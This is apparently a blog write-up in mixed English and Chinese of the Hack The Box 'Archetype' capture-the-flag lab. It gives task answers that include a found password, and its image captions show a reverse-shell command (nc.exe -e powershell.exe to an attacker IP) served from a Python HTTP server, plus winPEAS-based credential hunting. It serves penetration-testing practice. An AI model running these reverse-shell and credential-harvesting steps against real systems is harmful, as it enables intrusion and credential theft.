type
status
date
slug
summary
tags
category
icon
password
Catagory
Materials
Retired
Due date
Oct 17, 2025 03:49 AM
Status
Belong in
Progress
Task1:Which TCP port is hosting a database server?
1433
Task2:What is the name of the non-Administrative share available over SMB?
Task3:What is the password identified in the file on the SMB share?
M3g4c0rp123
Task4:What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Task5:What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Task6:What script can be used in order to search possible paths to escalate privileges on Windows hosts?
winpeas
先創造reverse shell,上傳nc.exe
![python3 -m http.server [port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F879c4752-998e-4320-b868-ac6285eb1585%2FUntitled.png?table=block&id=48ae8b4b-900c-4fb5-ae31-fa8d3c2143c7&t=48ae8b4b-900c-4fb5-ae31-fa8d3c2143c7&width=835&cache=v2)
![nc.exe -e powershell.exe [attacker ip] [attacker listening port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fe98e4b1d-0b59-4c4d-9d9d-b6432cbca624%2FUntitled.png?table=block&id=2e2d4099-38dd-4f7c-83b8-6745ea4e9593&t=2e2d4099-38dd-4f7c-83b8-6745ea4e9593&width=917&cache=v2)
![nc -lvnp [attacker listening port]](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F74bfdfac-43ab-43a2-ab57-3e5959c492d7%2FUntitled.png?table=block&id=3202f086-203b-4b5b-950c-2075f70bb65a&t=3202f086-203b-4b5b-950c-2075f70bb65a&width=611&cache=v2)
在victim中安裝winpeas
Task7:What file contains the administrator's password?
執行完winpeas,先看history
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
登入administrator
Sumit user flag
Sumit root flag
Reference
- 作者:ji3g4gp
- 網址:https://gpblog.vercel.app//article/HTB-Archetype
- 著作權聲明:本文使用 CC BY-NC-SA 4.0 著作權許可,使用請標注出處。
相關文章